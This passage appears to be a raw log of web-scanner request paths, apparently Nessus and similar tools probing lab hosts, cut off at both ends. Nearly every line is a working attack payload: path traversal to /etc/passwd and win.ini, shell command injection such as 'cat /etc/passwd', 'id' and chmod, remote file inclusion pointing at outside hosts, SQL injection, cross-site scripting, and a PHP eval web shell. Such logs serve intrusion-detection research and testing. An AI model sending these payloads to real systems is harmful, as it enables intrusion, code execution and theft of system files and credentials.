/etc/passwd||\n/examples/jsp/error/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/iktok2bw.pl?<script>cross_site_scripting.nasl</script>\n/eei78ore.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/documentation.html?phpmyadmin=&cat /etc/passwd&\n/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini\n/mpcgi/sensepost.exe?/c+dir\n/cgi-bin/visitor.exe\n/scripts/rx9ysf2iwv4j.pl\n/7u1pb2xi.htm?<script>document.cookie=\"testlwwz=718;\"</script>\n/scripts/blog/mt-check.cgi\n/scripts/zq9frlz6fcfp.php3\n/cgi-bin/index.php?act=arcade&do=stats&gameid=1'\n/cgi-bin/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd\n/phpmyadmin/includes/converter.inc.php?include_path=/etc/passwd\\x00\n/scripts/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--\n/scripts/2sfdqydfaknx.pl\n/help.php?q=\"&rm;q83399542&rem;\n/scripts/bpk_bsfe_4vq.sh\n/8t9v8k7x.nsf?<script>document.cookie=\"testhvje=9403;\"</script>\n//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\n/pma/db_details_importdocsql.php?submit_show=true&do=import&docpath=../\n/t7tm4m0b.fts?<script>cross_site_scripting.nasl</script>\n/weq93ppb.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\\x00\n/javascript/devel.exe\n/login/sm_login_screen.php?uid=\\\"><script>alert('vulnerable')</script>\n/cgi-sys/c32web.exe/changeadminpassword\n/cgis/ion-p?page=../../../../../etc/passwd\n/en-us/i686v90l.cgi?<script>document.cookie=\"testfutf=1550;\"</script>\n/javascript/maps.exe\n/recordingsmultihtml.pl?multi=/etc/passwd\\x00html\n/index.php?config[\"sipssys\"]=http://192.168.202.118:8080/ghl9il?\n/g8nu2yy7.html?<script>cross_site_scripting.nasl</script>\n/jnt3f86c.php?<script>document.cookie=\"testcmax=9270;\"</script>\n/examples/jsp/sessions/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/en-us/account/review.php?id=1&cat=&subcat=\"><script>alert('phpmydirectory_multiple_xss.nasl');</script>\n/a.jsp/<script>alert('vulnerable')</script>\n/script//ident/index.php?path_inc=http://192.168.202.118:8080/ghl9il?\n/33y9gcqq.idc?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/main.php?stuff=\"\\x0auname >q72652917 #\n/comments.php?scriptpath=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/javascript/.passwd.orig\n/v3axg1p8.dll?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/subscriptions.orig\n/1r8cfrlf.asp?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/5o9zq43e.jspa?<script>cross_site_scripting.nasl</script>\n/scripts/mail.php?id='/**/union/**/select/**/1,2,1331909424,4--&blog=1\n/examples/jsp/num/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--\n/examples/jsp/num/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/h4bi26jd.x?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\\x00\n/pbserver/..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904220&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/fc9t54l7.cgi?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/3hlysl2x.fts?<script>document.cookie=\"testgjbe=8505;\"</script>\n/qczkquis.pl?<script>document.cookie=\"testkwlg=5591;\"</script>\n/static//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd\n/scripts/check-lom.php?etcdir=http://192.168.202.118:8080/zz5thkvtmlgl?\n/examples/servlets/servlet/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\\x00\n/index.php?entry='\n/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1332008332,1,1,1,1,1,1,1--&blogid=1\n/comments.php?scriptpath=http://192.168.202.96:8080/no4ghqiguzhst??\n/fmnveedu.jspa?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/script/template/index.php?main_page_directory=http://192.168.202.96:8080/4dckqcc0acprbz?\n<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/mysubscription/\n/examples/servlets/servlet/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\\x00\n/scripts/buoalakxhatu.cgi\n/tuwjta1w.kspx?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/phpmyadmin/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\\x00\n/r3le3om5.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/title.exe\n/ju0u7kfo.jspa?<script>cross_site_scripting.nasl</script>\n/scripts/t769qwej0llr.php\n/hipkz026.php3?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/default.php?error_message=<script language=javascript>window.alert(document.cookie);</script>\n/scripts/nffhikq061nq.php\n/top.php?stuff=\"rm;q48162266&rem;\n/ows-bin/.passwd\n/6dlc2zm9.asp?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/javascript/.htpasswd.sfish\n/javascript/en.exe\n/examples/jsp/num/ion-p.exe?page=c:\\\\winnt\\\\win.ini\n/en-us/account/a1disp3.cgi?/../../../../../../etc/passwd\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+33+c9+51+52+53+ff+75+00+ff+54+05+04+85+c0+7e+01+c3+68+61+64+00+00+68+54+68++>>esbq\n/top.php?stuff=\"ping,-w,7000,-n,1,4.3.2.1|rem,\n/1qwv2p5p.php?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/javascript/error-log.exe\n/scripts/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd\n/javascript/document.bin\n/zuihld5m.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/index.php?entry='\n/examples/jsp/sessions/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\\x00\n/m2fpztty.php3?<script>cross_site_scripting.nasl</script>\n/bmeun223.kspx?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/main.php?stuff=ping;-w;7000;-n;1;1.2.3.4&rem;\n/scripts/htsearch.cgi\n/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd\n/scriptcon/\n/m2fpztty.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/sql.php?server=000&cfgservers[000][host]=hello&btndrop=no&goto=/etc/passwd\n/ao22ww7y.html?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/examples/jsp/jsp2/jspx/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/d765w06j.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/fastscripts2/\n/j4drbkil.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='\n/admin/htmlarea/popups/file/files.php?q=<script>alert('wvs-xss-magic-string-414355592517')</script>&mode=apparel\n/bl8sefdm.cgi?<script>cross_site_scripting.nasl</script>\n/javascript/mlist.exe\n/scripts/samples/search/filetime.idq\n/hjdzm96v.dll?<script>document.cookie=\"testbyqe=7474;\"</script>\n/javascript/index1.exe\n/javascript/low.exe\n/lsoix5h3.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jackrabbit/search.jsp?q=%\"<script>alert(1332008604)</script>\n/help.php?q=\"&del,q66241785&rem,\n/8t9v8k7x.php?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331923197',null,null,null,null --\n/cgi-sys/msmmask.exe?mask=/junk334\n/fpnpp5zg.fts?<script>document.cookie=\"testyias=101;\"</script>\n/phpmyadmin/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/9o6g5vkn.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/y8pmygrp.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<script>document.cookie=\"testtkio=5454;\"</script>\n/javascript/fuckoff.exe\n/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/vir0v3xfc?\\x00\n/g8nu2yy7.dll?<script>cross_site_scripting.nasl</script>\n/javascript/sws.exe\n/javascript/console.exe\n/nyvbv05h.mscgi?<script>document.cookie=\"testftxz=5980;\"</script>\n/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\\x00html\n/javascript/updater.exe\n/examples/jsp/num/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\\x00\n/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\\x00gwextranet_template_dir_traversal.nasl\n/manager/wordtrans.php?command=show_desc&advanced=1\";id; true \"\n/flash-xss/\n/scripts/index.php?board=nonexistant1452986522\n/8x6w469u.asp?<script>document.cookie=\"testgfjr=1286;\"</script>\n/examples/jsp/jsp2/el/al_initialize.php?alpath=/etc/passwd\\x00\n/l13b77e5.kspx?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/help.php?q=\"rm q63986192&rem \n/script/_conf/core/common-tpl-vars.php?confdir=@rfiurl?confdir=@rfiurl?\n/phpmyadmin/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>\n/main.php?logout=\"del\\x0cq94269861&rem\\x0c\n/cacti/texis.exe/nessus\n/javascript/.htpasswd.sfish/-2147483649\n/databasesubscriptionsthumb/\n/javascript/hour.exe\n/cgibin/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/albums/userpics/copperminer.jpg.php?cat /etc/passwd\n/en-us/account/include/theme.inc.php?fullpath=/etc/passwd\\x00\n/ju0u7kfo.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-sys/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/javascript/broker.exe\n/examples/jsp/num/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\\x00\n/examples/jsp/jsp2/el/admin.php?style=../../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/jspx/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/x7pclv4s.nsf?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/main.php?logout='\\x0dsleep\\x0910\\x09#\n/cabela's african safari/\n/examples/servlets/servlet/auktion.cgi?menue=../../../../../../../../../etc/passwd\n/scripts/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\\x00\n/nmw0do67.php3?<script>cross_site_scripting.nasl</script>\n/scripts/d3z7yywpyeoa.asp\n/kernel/loadkernel.php?installpath=/etc/passwd\\x00\n/v3axg1p8.jspa?<script>document.cookie=\"testxagh=6987;\"</script>\n/mod_membre/inscription.php?chemin=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/5qnlm5z2.aspx?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/en-us/w4996nr0.mscgi?<script>document.cookie=\"testttvs=7163;\"</script>\n/examples/jsp/checkbox/forum_2.php?msg=10&return=<script>foo</script>\n/ridin'high/\n/?<script>document.cookie=\"testyrbs=2855;\"</script>\n/examples/jsp/checkbox/core/editor.php?editor_insert_bottom=/etc/passwd\n/help.php?q=\"&ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/help.php?q=\"|ping\\x09-w\\x0910000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/search.cgi?qt=\"<script>alert(412325577727)</script>&search.x=0&search.y=0\n/cgi-local/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/main.php?stuff=\"ping\\x0b-w\\x0b9000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332009302&lang_crm=../../vtigerservice.php\\x00\n/javascript/.htaccess.sfish/\\'\\\"\n/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>\n/o35zot2r.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/mod_membre/inscription.php?chemin=http://cirt.net/rfiinc.txt??\n/i2n4v4rl.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/index.php?include_files[]=&include_files[query_string]=/etc/passwd\n/main.php?stuff=\"rm\\x09q12267523&rem\\x09\n/examples/jsp/error/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl\n/fc9t54l7.cfm?<script>document.cookie=\"testggad=2000;\"</script>\n/cacti/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/cgi-bin/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1\n/msvcrt.exe/\n/scripts/nffhikq061nq.asp\n/miz4r5hz.cfc?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/tamambolo_scriptprocdump/\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/top.php%3fstuff%3d2040844887&frm_user=q23487867&scr_height=&scr_width=\n/igtf0zon.fts?<script>cross_site_scripting.nasl</script>\n/ybz5rz7a.x?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/javascript/certified.exe\n/examples/servlets/servlet/user.cgi?url=\"><script>alert(\"gossamer_links_url_xss.nasl\");</script>&from=add\n/scripts/index.php?page=/etc/passwd\\x00\n/33y9gcqq.htm?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/no4ghqiguzhst?\\x00\n/scripting guide/\n/phpmyadmin/search=<script>alert('xss')</script>\n/subscriptions.jsf\n/miz4r5hz.x?<script>document.cookie=\"testviqu=1270;\"</script>\n/jdx255ea.jspa?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/main.php?logout=1:\"ls\"\n/q703m78q.asp?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/cgi-perl/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/scs86g1p.pl?<script>document.cookie=\"testquyx=2820;\"</script>\n/u95h6ymu.pl?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/javascript/cgi-shl.exe\n/top.php?stuff='&uname\\x09>q47253924\\x09#\n/3j8echh0.cfc?<script>document.cookie=\"testfuqi=4189;\"</script>\n/javascript/exec.exe\n/javascript/htpasswd.png\n/j734qobz.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/o1zj4u9v.pl?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/cacti/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/0u75ldxq.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini\n/1qwv2p5p.kspx?<script>document.cookie=\"testvqcy=252;\"</script>\n/manager/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435\n/rpxyx07v.idc?<script>document.cookie=\"testbnli=1975;\"</script>\n/cgi-bin/index.php?template=../../../loudblog/custom/config.php\\x00\n/j2kdmfw4.mscgi?<script>cross_site_scripting.nasl</script>\n/help.php?q=;rm q13157688 #\n/main.php?stuff=\"ping,-w,7000,-n,1,4.3.2.1&rem,\n/0qhcnefz.fts?<script>cross_site_scripting.nasl</script>\n/cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script>\n/scripts/index.php?album=../../../../../../../../../../boot.ini\\x00\n/h4bi26jd.exe?<script>document.cookie=\"testhrzx=1150;\"</script>\n/0w155a7c.php?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"&del,q13326619&rem,\n/fcgi-bin/r.cgi?file=../../../../../../../../../../etc/passwd\n//..\\..\\..\\..\\..\\..\\..\\..\\windows/win.ini\n/scriptguide/\n/javascript/document.temp\n/top.php?stuff='uname\\x09>q54162214\\x09#\n/javascript/big.exe\n/d765w06j.do?<script>cross_site_scripting.nasl</script>\n/script/ident/loginmodif.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/manager/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--\n/recordings/al_initialize.php?alpath=/etc/passwd\\x00\n/jnv890lt.cgi?<script>cross_site_scripting.nasl</script>\n/cgi-914/texis.exe/junk\n/main.php?logout='\\x0ddel q95689814 #\n/\\x0a\\x0a<script>alert(\\\"vulnerable\\\")</script>.jsp\n/phpmyadmin/sgdynamo.exe?htname=sgdynamo.exe\n/main.php?logout=&ver,>q27276952&rem,\n/scripts/includes/db_adodb.php?basedir=/etc/passwd\\x00\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,512612977),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\n/script//ident/index.php?path_inc=@rfiurl\n/help.php?q=\"ping -w 9000 -n 1 4.3.2.1&rem \n/help.php?q=&uname >q88293785 #\n/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,929714876,0,0,0,0,0--\n/top.php?stuff=\"\\x0duname >q44371957 #\n/awstats/awstats.pl?migrate=|echo;echo x;echo|awstats340378.txt\n/en-us/9kr0ih0v.exe?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/javascript/htpasswd.html\n/u8yiqilu.aspx?<script>document.cookie=\"testswjp=6010;\"</script>\n/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://192.168.202.118:8080/ghl9il?\n/addvip.php?msetstr[\"progsdir\"]=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/script/plugins/phpgacl/admin/index.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?\n/top.php?stuff=\"&ver >q91375949&rem \n/scripts/tomcat_proxy_directory_traversal.nasl1332008334\n/help.php?q=\"ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/javascript/letters.exe\n/javascript/paid.exe\n/examples/jsp/checkbox/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00.txt\n/recordings/index.php?entry='\n/vac1l5vm.do?<script>cross_site_scripting.nasl</script>\n/82q7ywa8.aspx?<script>document.cookie=\"testpwew=1315;\"</script>\n/ff_noscript/\n/help.php?q=\";del\\x09q65733963\\x09#\n/javascript/yearly.exe\n/javascript/opt.exe\n/examples/jsp/sessions/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd\n/static//..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c/windows/win.ini\n/contribute.cgi?template=/etc/passwd&contribdir=.&plugin=alkalay_cmd_exec.nasl\n/javascript/shtml.exe\n/examples/jsp/checkbox/popup.php?include_path=/etc/passwd\\x00\n/33y9gcqq.fts?<script>document.cookie=\"testnvxc=4301;\"</script>\n/javascript/makefile.exe\n/6dlc2zm9.dll?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/examples/jsp/error/listrec.pl?app=qmh-news&template=;ls /etc|\n/scripts/printenv.pl\n/eei78ore.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f\n/scripting tools/\n/htbin/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/9o6g5vkn.html?<script>cross_site_scripting.nasl</script>\n/i686v90l.exe?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/examples/jsp/num/home/search.asp?nchannel='1\n/scripts/info.dat\n/tuwjta1w.htm?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/scripts/ohelp/en_us/content/master/webadmin/webadmin.html\n/examples/jsp/cal/check_user_id.php?user_id=<script>foo</script>\n/main.php?stuff=\"ver;>q74579968&rem;\n/cgi-home/htimage.exe/path/filename?2,2\n/index.php?op=default&date=200607' union select 1,1425852379,1,1,1,1,1,1,1,1--&blogid=1\n/it's_cad-tastic!/\n/javascript/htpasswd.csv\n/j4oqyvga.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/shop/normal_html.cgi?file=|cat /etc/passwd|\n/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010395',null,null,null,null --\n/en-us/dda2qr7j.cfm?<script>cross_site_scripting.nasl</script>\n/hipkz026.cfm?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/qb2xy9aw.cfc?<script>cross_site_scripting.nasl</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+a+fa+>>ctdn\n/rbec2ohx.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/subscriptions.pfx\n/en-us/fo564rei.html?<script>cross_site_scripting.nasl</script>\n/j4rdyhw8.html?<script>document.cookie=\"testrluj=1420;\"</script>\n/bn857frh.dll?<script>cross_site_scripting.nasl</script>\n/nyjgaorz.jspa?<script>cross_site_scripting.nasl</script>\n/mod_membre/inscription.php?chemin=@rfiurl?chemin=@rfiurl?\n/conscripted_gifts/\n/cgi-win/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/[seccheck]/..%2f..%2f../ext.ini\n/ybz5rz7a.idc?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/cacti/index.php?act=arcade&do=stats&gameid=1'\n/scripts/zq9frlz6fcfp.pl\n/scripts/tools/dsnform.exe\n/bxnyrhmh.cfm?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/d7ktpmcq.mscgi?<script>cross_site_scripting.nasl</script>\n/7u1pb2xi.idc?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/cgi-win/sensepost.exe?/c+dir\n/scripts/force-download.php\n/admin/common/script.js.php.copy\n/scripts/nckowqpd4zng.sh\n/javascript/reprints.exe\n/forum-ra.asp?n=/etc/passwd\n/javascript/track.exe\n/recordings/starnet/addons/slideshow_full.php?album_name='1334444193\n/m5103snj.idc?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>\n/javascript/cpadmin.exe\n/main.php?logout=';del\\x09q16263765\\x09#\n/scripts/include/theme.inc.php?fullpath=/etc/passwd\\x00\n/phpmyadmin/documentation.html?phpmyadmin=map47fckapd3c2j9d7svslcjakhdm1fs' and sleep(4)='\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.28.202/&frm_user=&scr_height=&scr_width=q27812776\n/cgi-bin/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/cgi-perl/msmmask.exe?mask=/junk334\n/o35zot2r.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\nftp://192.168.23.203/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/examples/jsp/error/fxm.exe\n/script/param/param.inc.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.asp\n/scripts/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl\n/top.php?stuff=\"&del\\x09q45798999&rem\\x09\n/x7pclv4s.mscgi?<script>document.cookie=\"testiulz=3709;\"</script>\n/en-us/i686v90l.x?<script>document.cookie=\"testfutf=1550;\"</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+06+00+00+00+00+00+00+00+00+00+00+00+00+00+00+20+00+00+e0+44+41+54+41+00+00++>>esbq\n/phpmyadmin/hw3.cgi?daysonly=0).system('id').(\n/help.php?q='\\x0auname >q83228487 #\n/zoomstats/libs/dbmax/mysql.php?globals['lib']['db']['path']=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/l13b77e5.cfc?<script>document.cookie=\"testjvvf=7721;\"</script>\n/javascript/oa_servlets.exe\n/tiasystemdescription/\n/zuihld5m.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/newsscript.pl?mode=admin\n/main.php?frm_daynight=day&frm_passwd=q75353854&frm_referer=http%3a//192.168.26.202/&frm_user=&scr_height=&scr_width=\n/cgi-bin/cgicso?query=<script>alert('vulnerable')</script>\n/ygkjkngd.cgi?<script>document.cookie=\"testnago=4518;\"</script>\n/?\"><script>alert('struts_sa_surl_xss.nasl')</script>\n/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/javascript/.passwd.phtml\n/poker tournament - no limit texas hold'em/\n/scripts/sc877q2pzqne.cfm\n/recordings/sgdynamo.exe?htname=sgdynamo.exe\n/order/login.php?svr_rootscript=@rfiurl\n/en-us/33y9gcqq.mscgi?<script>document.cookie=\"testnvxc=4301;\"</script>\n/nmw0do67.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/www/delivery/ac.php?bannerid=-1331908787+or+1=1+--+';passthru(base64_decode($_server[http_nessus_ti5957ae]));die;/*\n/mv8wxfy9.nsf?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/copatranscript_20061024/\n/subscriptions.tar\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=dzp1jwatlet0voxta\n/qczkquis.jsp?<script>document.cookie=\"testkwlg=5591;\"</script>\n/examples/jsp/cal/lang/index.php?file=/etc/passwd\n/aj3pf49c.php?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/m2fpztty.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/hjdzm96v.cgi?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/zshscripts/\n/cgi/ion-p?page=../../../../../etc/passwd\n/zuihld5m.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/smartsearch.cgi?keywords=|/bin/cat /etc/passwd|\n/xsqln7eb.jspa?<script>document.cookie=\"testpcbb=9254;\"</script>\n/examples/jsp/error/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/script/fckeditor/editor/dialog/fck_flash.html\n/<?php eval($_post['q27992363']);?>\n/phpmyadmin//./../../../../../../../.windows/win.ini\n/help.php?q=ver\\xa0>q95666948&rem\\xa0\n/examples/jsp/error/ftp/ftp.pl?dir=../../../../../../etc\n/javascript/categories.exe\n/cgi-binfaq.php?skin=../../admin/manager&tplpath=admin\n/cgi-perl/gw5/gwweb.exe?help=bad-request\n/examples/jsp/error/activatemember?activatecode=&member=\"><script>alert('mvnforum_activatemember_xss.nasl')</script>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q33487769&frm_user=&scr_height=&scr_width=\n/cgi-bin/.htpasswd\n/dslpwt15.cfm?<script>document.cookie=\"testtkio=5454;\"</script>\n/main.php?stuff='\\x0asleep\\x099\\x09#\n/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd\n/igtf0zon.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/pam-passwdqc/\n//<body><script/src=\"http://www.example.com/test?rnd=q96295372\"></script>\n/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/ipb5ri?\n/javascript/access-log.1.exe\n/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332009307,416096840 -- \n/?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/0qhcnefz.x?<script>cross_site_scripting.nasl</script>\n/um7xpn15.jspa?<script>document.cookie=\"testotoy=6142;\"</script>\n/examples/jsp/cal/index.php?cat='\n/2004conferencedescription/\n/homebet/homebet.dll?form=menu&amp;option=menu-signin\n/scripts/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/manager/forumdisplay.php?fid=21\"><script>x</script>\n/cgi-914/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/popularvirusdescriptions/\n/u8yiqilu.cfc?<script>document.cookie=\"testswjp=6010;\"</script>\n/?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/javascript/minute.exe\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/search.jsp?q=%\"<script>alert(1331904374)</script>\n/cgi-bin/activeauctionsuperstore/iteminfo.asp?itemid=42'\n/opensearchdescription/\nftp://192.168.27.253/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/main.php?stuff=\"&del;q22147997&rem;\n/top.php?stuff=\"ver,>q37582953&rem,\n/awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/jbqahurnly.sh;echo|awstats912357.txt\n/6dlc2zm9.cfc?<script>document.cookie=\"testqpux=4016;\"</script>\n/qczkquis.cfm?<script>document.cookie=\"testkwlg=5591;\"</script>\n/top.php?stuff=\"&del\\x09q22847462\\x09#\n/gvx7m5ti.php?<meta http-equiv=set-cookie 